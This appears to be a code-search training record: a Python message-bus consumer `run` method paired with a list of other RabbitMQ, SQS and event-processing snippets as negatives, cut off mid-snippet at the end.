def run(self): self.debug = self.forwarder_options.get("debug", "0") != "0" if self.debug: self.logger.setLevel(logging.DEBUG) processor_count = int(self.forwarder_options.get("message_processor_count", 1)) cpu_count = multiprocessing.cpu_count() if processor_count > cpu_count: self.logger.info("processor_count (%s) > cpu_count. Defaulting to cpu_count", (processor_count, cpu_count)) processor_count = cpu_count self.event_processor = EventProcessor(self.forwarder_options) self.processor_pool = multiprocessing.Pool(processor_count) while True: try: self.consume_message_bus(test=self.testing) except Exception as e: self.retry_attempts += 1 if self.retry_attempts > self.max_retry_attempts: self.logger.critical("Too many attempts to reconnect (%d). Exiting now." % self.max_retry_attempts) break if isinstance(e, pika.exceptions.AMQPConnectionError) or isinstance(e, pika.exceptions.ConnectionClosed): self.logger.error("Connection is closed or refused, retrying in %s seconds" % self.retry_interval) else: self.logger.exception("An unexpected error occurred, retrying in %s seconds" % self.retry_interval) if self.connection is not None: self.connection.close() self.connection = None time.sleep(self.retry_interval)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process_amqp_events(self):\n self.connection.process_data_events()", "def consume():\n with conn.channel() as chan:\n \n def on_msg_recv(msg):\n \"\"\" Called when message arrives from RabbitMQ\n \"\"\"\n print \"processor|%s::Received message: %s\" % (UID, msg.body)\n chan.basic_ack(msg.delivery_tag)\n log(msg.body)\n process_msg(msg)\n \n \n # Declare and bind queue. RabbitMQ does nothing if queue already exists.\n chan.exchange_declare(exchange = EXCHANGE,\n type = EXCHANGE_TYPE)\n queue = chan.queue_declare(QUEUE)\n chan.queue_bind(exchange = EXCHANGE, \n queue = QUEUE, \n routing_key = ROUTING_KEY)\n \n # Declare that we are going to listen to given queue\n chan.basic_consume(queue = QUEUE, \n callback = on_msg_recv)\n \n # Main loop. Waiting for messages from RabbitMQ.\n while True:\n chan.wait()", "def start_consuming(self):\n logger.info('Issuing consumer related RPC commands')\n self.add_on_cancel_callback()\n logger.info(\"[{}] Waiting for messages on exchange {}\".format(self.bot_id, self.exchange))\n self._consumer_tag = self._channel.basic_consume(self.on_message,\n self.queue_name)", "def listen_commands(self):\n self._consumer_rabbit_connection = BlockingConnection(ConnectionParameters(self._rabbit_host))\n self._consumer_rabbit_channel = self._consumer_rabbit_connection.channel()\n\n # Listen buy/sell orders from external system\n self._listen_queue(QueueName.CMD_BUYSELL, self.on_cmd_buysell)\n self._listen_queue(QueueName.MSG_RAW, self.on_raw_msg)\n # self._logger.info(f\"Declaring rabbit queue {QueueName.CMD_BUYSELL}\")\n # self._consumer_rabbit_channel.queue_declare(queue=QueueName.CMD_BUYSELL, durable=True, auto_delete=True)\n # self._logger.info(f\"Consiming to rabbit queue {QueueName.CMD_BUYSELL}\")\n # self._consumer_rabbit_channel.basic_consume(QueueName.CMD_BUYSELL, self.on_cmd_buysell,\n # consumer_tag=\"WebQuikBroker\")\n self._consumer_rabbit_channel.start_consuming()", "def run(self):\n\n def callback(ch, method, properties, body):\n json_body = json.loads(body)\n self.buffer.append(Fvalue.fromdict(json_body))\n\n sleep(5) # We introduce a slight delay to let the RabbitMQ container to accept connections\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.mq_host,port=self.mq_port))\n channel = connection.channel()\n channel.exchange_declare(exchange=self.mq_host + '_exchange', exchange_type='direct')\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=self.mq_host + '_exchange',\n queue=queue_name,\n routing_key=self.routing_key)\n channel.basic_consume(callback,queue=queue_name,no_ack=True)\n channel.start_consuming()", "def start_consuming(self):\n self.logger.debug(\"Issuing consumer related RPC commands\")\n\n self._channel.basic_qos(prefetch_count=self._max_concurrent)\n self._channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\n consume_kwargs = {\"queue\": self._queue_name}\n if PIKA_ONE:\n consume_kwargs[\"on_message_callback\"] = self.on_message\n else:\n consume_kwargs[\"consumer_callback\"] = self.on_message\n\n self._consumer_tag = self._channel.basic_consume(**consume_kwargs)", "def run(self):\n try:\n\n self._connection = self.connect()\n self._connection.ioloop.start()\n except (KeyboardInterrupt, SystemExit):\n self.stop()\n except Exception as e:\n logger.warn(\"Exception: %s\", str(e))\n logger.warn(\"Exception caught on rabbit consumer for process: %s with consumer id %s\", threading.current_thread, str(self.consumer_id))\n self.internal_error_queue.put(self.consumer_id)", "def preProcess(self, msg):\n\n # open connection\n self.conn = Connection(\n user=self.user, password=self.password,\n vhost=self.vhost, host=self.host,\n heartbeat=self.heartbeat, debug=self.debug)\n\n # create AMQP channel\n self.channel = self.conn.channel()\n self.channel.exchange.declare(self.exchange, self.exchange_type)\n self.channel.queue.declare(self.queue, self.auto_delete)\n self.channel.queue.bind(self.queue, self.exchange, self.routing_key)", "def preProcess(self, msg):\n\n # open connection\n self.conn = Connection(\n user=self.user, password=self.password,\n vhost=self.vhost, host=self.host,\n heartbeat=self.heartbeat, debug=self.debug)\n\n # create AMQP channel\n self.channel = self.conn.channel()\n self.channel.exchange.declare(self.exchange, self.exchange_type)\n self.channel.queue.declare(self.queue, self.auto_delete)\n self.channel.queue.bind(self.queue, self.exchange, self.routing_key)", "def preProcess(self, msg):\n\n # open connection\n self.conn = Connection(\n user=self.user, password=self.password,\n vhost=self.vhost, host=self.host,\n heartbeat=self.heartbeat, debug=self.debug)\n\n # create AMQP channel\n self.channel = self.conn.channel()\n self.channel.exchange.declare(self.exchange, self.exchange_type)\n self.channel.queue.declare(self.queue, self.auto_delete)\n self.channel.queue.bind(self.queue, self.exchange, self.routing_key)", "def _begin_consuming(self):\n self._consuming = True\n loop = asyncio.get_event_loop()\n self._message_queue = asyncio.Queue(\n maxsize=self.app.settings['SQS_PREFETCH_LIMIT'],\n loop=loop,\n )\n loop.create_task(self._consume())", "def consumeMsg():\n\tosuser = 'osdev'\n\tospass = 'osdev'\n\toshost = '10.32.29.94'\n\tosport = '5672'\n\tosvhost = '/openstack'\n\tneutronExchange = Exchange('quantum', type='topic', durable=False)\n\tinfoQueue = Queue('exthook', exchange=neutronExchange , durable=False,\n\t\t\trouting_key='notifications.info')\n\twith Connection(\"\".join(['amqp://', osuser, ':', ospass, '@', \n\t\toshost, ':',osport, '/', osvhost])) as conn:\n\t\twith conn.Consumer(infoQueue, callbacks=[msgParse]):\n\t\t\twhile True:\n\t\t\t\ttry: \n\t\t\t\t\tconn.drain_events()\n\t\t\t\texcept Exception, e:\n\t\t\t\t\tlogging.exception('Draining events from AMQP stop')\n\t\t\t\t\tbreak", "def start_consuming(self):\n\n for queue in self._handlers.keys():\n self._consumer_tags += self._channel.basic_consume(self.on_message,\n queue=queue)", "def perform_setup():\n global credentials, connection, channel\n credentials = pika.PlainCredentials('guest', 'guest') # AUTH via Default guest user on RabbitMQ\n connection = pika.BlockingConnection(pika.ConnectionParameters(\"127.0.0.1\", 5672, '/', credentials)) # Using rabbit-mq container name to access the RabbitMQ container from other containers\n channel = connection.channel()\n channel.queue_declare(queue='poll', durable=True)", "def start_publishing(self):\n print(f\"{self._connection_param}: Issuing consumer related RPC commands\")\n # self._channel.confirm_delivery(self.on_delivery_confirmation)\n self.schedule_next_message(self.SLOW_SEND)", "async def do_startup(config, output_fname, event_loop):\n\n log.info(\"Creating AMQP receive channel ...\")\n rcv_trans, rcv_proto, rcv_chan = await make_amqp_channel(config)\n\n log.info(\"Setting up event exchange ...\")\n await rcv_chan.exchange_declare(\n exchange_name=config.event_exchange, type_name=\"fanout\"\n )\n\n logger = EventLogger(config, output_fname, event_loop)\n\n for signame in [\"SIGINT\", \"SIGTERM\", \"SIGHUP\"]:\n signum = getattr(signal, signame)\n handler = partial(term_handler, signame=signame, loop=event_loop)\n event_loop.add_signal_handler(signum, handler)\n\n log.info(\"Setting up AMQP receiver ...\")\n bm_callback = partial(handle_broker_message, logger)\n await make_receiver_queue(bm_callback, rcv_chan, config, \"\")\n\n return rcv_trans, rcv_proto", "def run(self):\n self.channel.queue_declare(self._request_queue)\n self.channel.basic_consume(self._request_queue, self.on_message)\n try:\n msg = \"Waiting for message ...\"\n print(msg)\n logging.info(msg)\n self.channel.start_consuming()\n except KeyboardInterrupt:\n self.channel.stop_consuming()\n\n self.connection.close()", "def __init__(self, event_queue, connection_options):\n super(GerritEventsStream, self).__init__()\n self._event_queue = event_queue\n self._connection_options = connection_options\n self._running = True", "def run(self):\n\n self.make_connection()\n self.channel()\n self.declare_queue()\n self.publish_message()\n self.close_connection()", "def _setup_tubes(self):\n chan = self.channel\n inp = self.config[self.MODULE_NAME]['amqp']['in']\n out = self.config[self.MODULE_NAME]['amqp']['out']\n if inp['exchange']:\n log.info('generating Input Queue'+ str(inp))\n chan.exchange_declare(**inp)\n self.qname = chan.queue_declare(exclusive=True).queue\n chan.queue_bind(exchange=inp['exchange'],queue=self.qname)\n self.consume = lambda cb : chan.basic_consume(cb,queue=self.qname,no_ack=True)\n self.start_loop = lambda : pika.asyncore_loop()\n\n if out['exchange']:\n log.info('generating Output Exchange'+ str(out))\n chan.exchange_declare(**out)\n self.publish = lambda msg: self.channel.basic_publish(exchange=out['exchange'],routing_key='',body=msg)", "async def run(app):\n app.logger.debug(\"START RABBITMQ \")\n config = app.config.get('RABBITMQ')\n\n app.logger.debug(config)\n\n while True:\n loop = asyncio.get_event_loop()\n\n try:\n app.logger.debug(\"Create connection!\")\n connection = await aio_pika.connect_robust(\n \"amqp://{}:{}@{}\".format(\n config['username'],\n config['password'],\n config['host']\n ), loop=loop\n )\n # Creating channel\n app.logger.debug(\"Create channel\")\n channel = await connection.channel()\n async with connection:\n app.logger.debug(\"create exchange {}\".format(config['exchange_name']))\n await channel.declare_exchange(config['exchange_name'])\n\n app.logger.debug(\"create queue {}\".format(QUEUE_NAME))\n\n queue = await channel.declare_queue(\n QUEUE_NAME, auto_delete=True, durable=False\n )\n await queue.bind(exchange=config['exchange_name'], routing_key='*')\n\n async with queue.iterator() as queue_iter:\n async for message in queue_iter:\n async with message.process():\n content = message.body.decode()\n app.logger.debug(\"RABBITMQ: got message {}\".format(content))\n loop = asyncio.get_event_loop()\n loop.create_task(app.hub.dispatch_message(content))\n except Exception as e:\n app.logger.error(\"Exception in connection with rabbitmq. Back of a bit, and try again\")\n app.logger.exception(e)\n await asyncio.sleep(3)", "def listen(self):\n result = self.channel.queue_declare(queue=self.config['queue'], \n exclusive=True)\n if self.endpoints is not None:\n for key in self.endpoints:\n self.channel.queue_bind(exchange=self.config['exchange'], \n queue=self.config['queue'],\n routing_key=f\"sensor_value.{key}\")\n else:\n self.channel.queue_bind(exchange=self.config['exchange'],\n queue=self.config['queue'],\n routing_key=\"sensor_value.#\")\n \n self.channel.basic_consume(queue=self.config['queue'], \n on_message_callback=self.decode_values, \n auto_ack=True)\n\n # starts a while-type loop\n print(\"wabbit eatin hay\")\n self.channel.start_consuming()", "def start_consuming(self):\n # LOGGER.info('Issuing consumer related RPC commands')\n if self._init_ok_ctrl and self._init_ok_task:\n self._channel_ctrl.add_on_cancel_callback(self.on_consumer_ctrl_cancelled)\n self._channel_task.add_on_cancel_callback(self.on_consumer_task_cancelled)\n self._consumer_tag_task = self._channel_task.basic_consume(\n self.queue_task,\n auto_ack=False,\n on_message_callback=self.on_message\n )\n self._consumer_tag_ctrl = self._channel_ctrl.basic_consume(\n self._topic_queue_name,\n auto_ack=False,\n on_message_callback=self.on_topic\n )\n self.was_consuming = True\n self._consuming = True", "def do_start(self):\n threading.Thread(group = None, \n target = self._subscribe_message, name = \"RabbitMQSubscribeThread\") .start()\n threading.Thread(group = None, \n target = self._publish_message, name = \"RabbitMQPublishThread\").start()", "def linkRabbit(self):\n\n print(\"Listening for RabbitMQ messages\")\n\n # RabbitMQ setup\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(host='localhost'))\n channel = connection.channel()\n\n #channel.exchange_declare(exchange='freqSweep', exchange_type='fanout')\n channel.exchange_declare(exchange='pwrSweep', exchange_type='fanout')\n\n result = channel.queue_declare(queue='', exclusive=True)\n queue_name = result.method.queue\n\n # channel.queue_bind(exchange='freqSweep', queue=queue_name)\n channel.queue_bind(exchange='pwrSweep', queue=queue_name)\n channel.basic_consume(queue=queue_name, on_message_callback=self.rabbitCallback, auto_ack=True)\n channel.start_consuming()", "def subscribe_to_commands(self):\n self.basic_consume(self.process_command, queue=self.name)", "def prepare(self):\n if self.prepared:\n return\n self.socket.listen()\n for name in self.socket.getSocketNames():\n self.serverEventHandler.preServe(name)\n for _ in xrange(self.threads):\n thread = Worker(self.tasks)\n thread.setDaemon(True)\n thread.start()\n\n for fileno in self.socket.handles:\n self.poller.read(fileno)\n self.poller.read(self._read.fileno())\n\n self.prepared = True", "def consume_message(message):\n # Assign the message to the global drone_message\n global drone_message\n drone_message = message\n # The Rabbit mq runs in the localhost and the username , password is\n # athavan\n credentials = pika.PlainCredentials('guest', 'guest')\n # Pass the mqhost , port , virtualhost and credentials\n parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)\n connection = pika.SelectConnection(parameters, on_connected)\n try:\n connection.ioloop.start()\n except KeyboardInterrupt:\n # close the connnection\n connection.close()\n # loop until we are fully closed. It will stop on its own\n connection.ioloop.start()", "def processEvent(self):\n # Note: break out of event dispatch loop when closedown event is received\n # and closing flag is set. This is to prevent DoS attack by faked closedown\n # event type, and to ensure that prior events received are all processed.\n delay_on_error_min = 0.125 # Back off retry interval on error..\n delay_on_error_max = 20.0 # ..\n delay_on_error = delay_on_error_min # ..\n while True:\n if delay_on_error < delay_on_error_max:\n delay_on_error *= 2\n try:\n # PLEASE NOTE: In the event that the HTTPC is run as duplex, not simplex\n # then the post methods will be delayed if nothing is sent down to the client\n # from the server. This timeout is controlled by QUEUE_WAIT_TIMEOUT in EventRouterHTTPS.py\n if self._simplex == True:\n self._queueEvent.wait()\n self._queueEvent.clear()\n \n if not self._queue.empty():\n Trace(\"%s queue.get ...\"%(self.getUri()), \"EventLib.EventRelayHTTPC\")\n ###msgbody = self._queue.get()\n ###Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n ###self._event.set()\n msgbody = self.getQueuedItem()\n [typ,env] = msgbody\n if typ == \"closedown\":\n if self._closing: break\n else:\n # process request as an HTTP POST request\n data = makeEnvelopeData(env)\n headers = { \"Content-type\": \"text/plain\",\n \"Accept\": \"text/plain\",\n \"Content-length\": str(len(data)) }\n self._httpcon.request(\"POST\", \"/request_path_ignored\", data, headers)\n response = self._httpcon.getresponse()\n delay_on_error = delay_on_error_min\n elif self._simplex == False:\n # Nothing in queue:\n # issue a GET for incoming events\n _log.info(\"%s HTTP get ...\"%(self.getUri()))\n headers = { \"Accept\": \"text/plain\" }\n self._httpcon.request(\"GET\", \"/request_path_ignored\", None, headers)\n response = self._httpcon.getresponse()\n if response.status == 200:\n delay_on_error = delay_on_error_min\n msgbody = response.read()\n Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n # Parse message and act accordingly\n msgdata = parseMessageData(msgbody)\n Trace(\"%s get msgdata: %s\"%(self.getUri(),str(msgdata)), \"EventLib.EventRelayHTTPC\")\n if msgdata == None:\n #TODO: Log \"Request body malformed\"\n pass\n elif msgdata[0] == \"forward\":\n # msgdata = [\"forward\", [['R1', 'R2', 'R3'], 'ev:typ', 'ev:src', 'payload']]\n event = makeEvent(evtype=msgdata[1][1],source=msgdata[1][2],payload=msgdata[1][3])\n env = constructEnvelope(msgdata[1][0], event)\n self.forward(event, env)\n elif msgdata[0] == \"idle\":\n # Idle response gives client a chance to send if anything is queued\n pass\n else:\n #TODO: handle closedown message?\n Warn( \"%s Request body unrecognized option: %s\"%(self.getUri(),msgdata[0]), \"EventRelayHTTPC\")\n pass\n elif response.status == 503:\n Trace( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n # Remote end closed down\n break\n else:\n # TODO: (log error response)\n Warn( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n \n except httplib.BadStatusLine, e:\n # This can happen at closedown\n Info( \"%s processEvent bad response: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.CannotSendRequest, e:\n # This can happen at closedown\n Info( \"%s Cannot send request: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.ResponseNotReady, e:\n # This can happen at startup and sometimes other times:\n # maybe multiple requests on a single HTTP connection object?\n Info( \"%s Response not ready: (%s)\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except socket.error, e:\n Warn( \"%s Socket error: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n return", "def __init__(self, amqp_url, *handlers):\n\n self._consumer_tags = []\n\n RabbitMQ.__init__(self, amqp_url)\n\n # save our handlers for ruture use\n self._handlers = {}\n for handle in handlers:\n for k, v in handle.handlers().items():\n self._handlers[k] = v", "def consume(self):\n LOGGER.debug('Consumer Initialized')\n # self.connect()\n channel = self.get_channel()\n self._bind_things(channel)\n\n try:\n LOGGER.info('Start consuming')\n channel.start_consuming()\n except ConnectionClosed:\n LOGGER.exception('Pika connection closed detected. Will attempt to start consuming again')\n self.consume()\n except KeyboardInterrupt as e:\n LOGGER.info('Keyboard interrupt, stop consuming')\n self.shutdown()\n raise e\n except Exception as e:\n LOGGER.exception(\"'%s\" % str(e))\n self.shutdown()\n if self.settings.CONSUMER['RAISE_EXCEPTION']:\n LOGGER.info(\"CONSUMER RAISED EXCEPTION\")\n raise e", "def receive_incoming_messages_thread(self):\n\n def on_error(partition_context, error):\n logger.error(\"EventHub on_error: {}\".format(str(error) or type(error)))\n\n def on_partition_initialize(partition_context):\n logger.warning(\"EventHub on_partition_initialize\")\n\n def on_partition_close(partition_context, reason):\n logger.warning(\"EventHub on_partition_close: {}\".format(reason))\n\n def on_event(partition_context, event):\n reset_watchdog()\n if event:\n self.executor.submit(self.dispatch_incoming_message, event)\n\n logger.info(\"Starting EventHub receive\")\n with self.eventhub_consumer_client:\n self.eventhub_consumer_client.receive(\n on_event,\n on_error=on_error,\n on_partition_initialize=on_partition_initialize,\n on_partition_close=on_partition_close,\n max_wait_time=30,\n )", "def ProcessEvents(self):\n self.work_queue.put(self.__ProcessEventsAsync)", "def receive(channel):\n\n def callback(ch, method, properties, body):\n\n event = json.loads(body)\n event_info = event['event_info']\n event_type = event['type']\n success = True\n logger.info(f\"Received event {event}\")\n\n try:\n # Events coming from account microservice\n\n if event_type == USER_CREATED_EVENT:\n\n add_and_publish_event(\n GlobalPreferencesCreatedEvent(event['uuid'], event_info['id'], dict(\n vehicles=['bus', 'subway', 'train', 'tram', 'car', 'walking', 'bike', 'taxi',\n 'enjoy', 'mobike'],\n personal_vehicles=[])),\n PREFERENCES_CREATED)\n\n elif event_type == USER_DELETED_EVENT:\n\n add_and_publish_event(GlobalPreferencesDeletedEvent(event['uuid'], event_info['id']), PREFERENCES_DELETED)\n\n # Events generated in this microservice\n\n elif event_type == PREFERENCES_CREATED_EVENT:\n add_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_MODIFIED_EVENT:\n modify_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_DELETED_EVENT:\n delete_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == CALENDAR_CREATED_EVENT:\n add_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_MODIFIED_EVENT:\n modify_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_DELETED_EVENT:\n delete_calendar(Calendar(**event_info))\n\n except SQLAlchemyError as e:\n\n # to deal with at least once delivery of rabbitmq and the create methods which are not idempotent\n if (event_type == USER_CREATED_EVENT or event_type == PREFERENCES_CREATED_EVENT or event_type == CALENDAR_CREATED_EVENT) \\\n and method.redelivered and isinstance(e, IntegrityError):\n logger.info(f'Not processed redelivered event {event}')\n\n else:\n logger.info(f\"Couldn't process event {event}\")\n success = False\n\n finally:\n if success: # ack only if the event has been processed\n ch.basic_ack(delivery_tag=method.delivery_tag)\n logger.info(f\"Processed and acked event {event}\")\n\n # channel.basic_qos(prefetch_count=1)\n channel.basic_consume(callback,\n queue=CALENDAR_QUEUE)\n\n logger.info(\"Started listening to events\")\n channel.start_consuming()", "def run(self):\n self.logger.info(\"starting Dashi consumer\")\n while not self.shutdown:\n self.rpc.listen()", "def collect_data(self):\n self.logger.info(\"Waiting for incoming data ...\")\n while True:\n item = self.in_queue.get()\n self.logger.info(\"Received data!\")\n self.collector_process_data(item)", "def run(self) -> None:\n while self.data_incoming or len(self._queue):\n if not self._queue:\n logging.info(\"Consumer %d is sleeping since queue is empty\", self._name)\n time.sleep(0.75)\n print(self._queue.get())\n time.sleep(0.5)", "def start_consuming(self, channel, rx_queue_name):\n if self.should_stop():\n logger.info(\"ready to stop, pause to consume\")\n return\n logger.info('Issuing consumer related RPC commands')\n self._consumer_tag = channel.basic_consume(\n self.on_message, rx_queue_name, auto_ack = False)\n channel.start_consuming()", "def handle_events(self):\n self._busy_mutext.acquire()\n try:\n event = self.EventsFactory.pull_event()\n while event:\n self.logger.debug('Handling new event: {}'.format(event.id))\n event_endpoint_scope_classes = event.EndpointScope.get_static_hierarchy()\n stat_collection = []\n for statistics_cls in self._statistics:\n if statistics_cls.EndpointScope in event_endpoint_scope_classes:\n statistics = statistics_cls.init_by_event(event)\n self.logger.debug(f'Collecting statistics: {statistics}')\n stat_collection.append(statistics)\n statistics.collect()\n self.logger.debug('Checking for tasks to run')\n for task_cls in self.get_conditional_tasks():\n if task_cls.EndpointScope in event_endpoint_scope_classes:\n task_endpoint_scope_classes = task_cls.EndpointScope.get_static_hierarchy()\n statistics = []\n for stats in stat_collection:\n if stats.Endpoint == task_cls.Endpoint and stats.EndpointScope in task_endpoint_scope_classes:\n statistics.append(stats)\n task = task_cls(event.EndpointScope.init_by_event(event), statistics, event)\n task.handle()\n event = self.EventsFactory.pull_event()\n finally:\n self._busy_mutext.release()", "def start(self):\n self._connect()\n self._init_exchange()\n self._init_queue()\n self._bind_queue()", "def __init__(self, routing_key):\n self.routing_key = routing_key\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=rabbitmq_hostname))\n self.channel = self.connection.channel()\n result = self.channel.queue_declare(queue='', exclusive=True, durable=True)\n self.callback_queue = result.method.queue\n\n self.channel.basic_consume(\n queue=self.callback_queue,\n on_message_callback=self.on_response,\n auto_ack=True\n )", "async def run(self):\n\n self.connection = await aio_pika.connect(self.mq_connection_str, loop=asyncio.get_event_loop())\n self.channel = await self.connection.channel()\n\n # connect to exchanger market data\n # market data send with routing key format: message_type.data_type.exchange.pair[.time_frame]\n # message_type == update | starting, data_type == ticker | candles | depth,\n # exchange, pair, time_frame - sending by listing_info\n binding_mask = '*.*.*.#'\n topic_logs_exchange = await self.channel.declare_exchange(self.exchanger, aio_pika.ExchangeType.TOPIC)\n queue_topic = await self.channel.declare_queue('', auto_delete=True)\n await queue_topic.bind(topic_logs_exchange, routing_key=binding_mask)\n\n # listener queue for listing information\n queue_for_listing = await self.channel.declare_queue('', auto_delete=True)\n await queue_for_listing.bind(topic_logs_exchange, routing_key=self.name_queue_for_listing)\n\n # listener queue for error\n queue_for_error = await self.channel.declare_queue('', auto_delete=True)\n await queue_for_error.bind(topic_logs_exchange, routing_key=self.name_queue_for_error)\n\n def callback_crypto_currency_market_data(message):\n \"\"\"Callback for consume market data\"\"\"\n body = json.loads(message.body.decode('utf-8'))\n \n # routing_key have view: message_type.data_type.exchange.pair[.time_frame]\n # message_type == update | starting, data_type == ticker | candles | depth,\n # exchange, pair, time_frame - sending by listing_info\n # mask: *.*.*.#\n message_type = message.routing_key.split('.')[0]\n data_id = '.'.join(message.routing_key.split('.')[1:])\n\n if message_type == 'update':\n for observer in self.subscribers.get(data_id):\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=message.routing_key,\n data=body\n )\n ))\n elif message_type == 'starting':\n # if exist waiters, send data and move waiters in subscribers\n if not self.waiters_first_msg.get(data_id):\n return\n\n new_subscribers = []\n while self.waiters_first_msg[data_id]:\n observer = self.waiters_first_msg[data_id].pop()\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=message.routing_key,\n data=body\n )\n ))\n new_subscribers.append(observer)\n\n # if not subscribers on this data_id, init new dict-value, else append to exist array\n subscribers = self.subscribers.get(data_id, None)\n if not subscribers and new_subscribers:\n self.subscribers[data_id] = new_subscribers\n asyncio.get_event_loop().create_task(self._send_message_for_subscribe(data_id))\n else:\n for new_subscriber in new_subscribers:\n if new_subscriber not in self.subscribers[data_id]:\n self.subscribers[data_id].append(new_subscriber)\n\n def callback_crypto_currency_listing(message):\n \"\"\"Callback for consume information about access pairs, exchanges and timeframes\"\"\"\n body = json.loads(message.body.decode('utf-8'))\n data_id = TYPE_LISTING\n\n if not self.waiters_first_msg.get(data_id):\n return\n\n while self.waiters_first_msg[data_id]:\n observer = self.waiters_first_msg[data_id].pop()\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=data_id,\n data=body\n )\n ))\n\n def callback_crypto_currency_error(message):\n \"\"\"Callback for consume error queue\"\"\"\n logger.error(message.body.decode('utf-8'))\n\n body = json.loads(message.body.decode('utf-8'))\n\n # validation\n error_place = body.get('error_place')\n message = 'Sorry! Error on server'\n if not message or not error_place:\n return\n\n # send information to ws, that wait or subscribe on error_place\n waiters = self.waiters_first_msg.get(error_place, ())\n for observer in waiters:\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=error_place,\n error=message\n )\n ))\n\n subscribers = self.subscribers.get(error_place, ())\n for observer in subscribers:\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=error_place,\n data=message\n )\n ))\n\n await queue_topic.consume(callback_crypto_currency_market_data)\n await queue_for_listing.consume(callback_crypto_currency_listing)\n await queue_for_error.consume(callback_crypto_currency_error)", "def run(self):\n\t\tfor item in self.pubSub.listen():\n\t\t\tself.processItem(item)", "def run_task(self):\n process_market_data_coro = self._process_queue(\n callback=self._handle_market_data,\n socket_info=self._market_data_sock_info,\n has_heartbeat_seq=False)\n\n async def listen_market_data():\n try:\n await self._open_market_data_websocket()\n await self._listen_on_market_data()\n finally:\n await self._market_data_sock_info.ws.close()\n\n # If we are not authenticated, return just the market data coroutines.\n if not self._authenticate:\n return asyncio.gather(listen_market_data(), process_market_data_coro)\n\n process_orders_coro = self._process_queue(callback=self._handle_orders,\n socket_info=self._orders_sock_info)\n\n async def listen_orders():\n try:\n await self._open_orders_websocket()\n await self._listen_on_orders()\n finally:\n await self._orders_sock_info.ws.close()\n\n async def first_notify():\n await self.setup_event()\n self.exchange_state.update_publisher.notify(\n description=\"Initialized.\")\n\n return asyncio.gather(listen_orders(), process_orders_coro,\n listen_market_data(), process_market_data_coro,\n first_notify())", "def _consume(self):\n # HACK: run_in_executor is used as a workaround to use boto\n # inside a coroutine. This is a stopgap solution that should be\n # replaced once boto has support for asyncio or aiobotocore has\n # a stable release.\n loop = asyncio.get_event_loop()\n receive_message = partial(\n self.client.receive_message,\n QueueUrl=self.app.settings['SQS_INBOUND_QUEUE_URL'],\n AttributeNames=self.app.settings['SQS_ATTRIBUTE_NAMES'],\n MessageAttributeNames=self.app.settings['SQS_MESSAGE_ATTRIBUTES'],\n MaxNumberOfMessages=self.app.settings['SQS_MESSAGE_BATCH_SIZE'],\n VisibilityTimeout=self.app.settings['SQS_VISIBILITY_TIMEOUT'],\n WaitTimeSeconds=self.app.settings['SQS_WAIT_TIME'],\n )\n while True:\n future = loop.run_in_executor(None, receive_message)\n messages = yield from future\n for message in messages.get('Messages', []):\n message['Body'] = json.loads(message['Body'])\n yield from self._message_queue.put(message)", "def execute(self):\n self.running = True\n last_timestamp = datetime.datetime.now()\n\n self.log(\"Starting...\")\n while self.running:\n\n try:\n\n # if (datetime.datetime.now() - last_timestamp).total_seconds() < self.sendfreq:\n # self.tick()\n # continue\n\n # if self.debug:\n\n sent = 0\n while self.inbox.qsize() > 0:\n\n # Boolean flag to determine message validity\n valid = True\n\n # get message\n message = self.inbox.get_nowait()\n\n # Iterates over all the filters and overrides to modify the\n # stream's default capability.\n for modifier in self.modifiers:\n if isinstance(modifier, BaseOverride):\n message = modifier.apply(message)\n elif isinstance(modifier, BasePredicate):\n if not modifier.apply(message):\n valid = False\n\n # Must be a break and not return because setting\n # the initialization flag would be skipped if it\n # needed to be set.\n break\n\n # the incoming message was not filtered\n if valid:\n\n # process the incoming message\n self.handle(message)\n\n sent += 1\n\n if self.sendlimit > 0:\n if sent >= self.sendlimit:\n break\n\n # logging sent messages\n self.log(\"Sent %s messages...\" % (sent - 1 if sent > 0 else 0))\n\n except Empty:\n # Empty signifies that the queue is empty, so yield to another node\n pass\n except Exception:\n self.log_exception(\"Error in '%s': %s\" % (self.__class__.__name__, self.name))\n # self.tick()\n finally:\n # delay processing\n self.sleep(self.sendfreq)\n\n # self.tick()\n # self.stop()\n self.log(\"Exiting...\")", "def run_collectd_amqp(self):\n amqp_url = 'amqp://admin:admin@{}:{}/%2F'.format(self.mgmt['ip'], self.AMPQ_PORT)\n amqp = AmqpConsumer(amqp_url, self._queue)\n try:\n amqp.run()\n except (AttributeError, RuntimeError, KeyboardInterrupt):\n amqp.stop()", "def consume(docker_client, redis_client):\n print 'Start consuming events from %s' % docker_client.base_url\n since = redis_client.get('castor:last_event')\n for event in docker_client.events(decode=True, since=since):\n for hook in settings.HOOKS:\n tasks.dispatch_event.delay(event, hook)\n redis_client.set('castor:last_event', event['time'])", "def 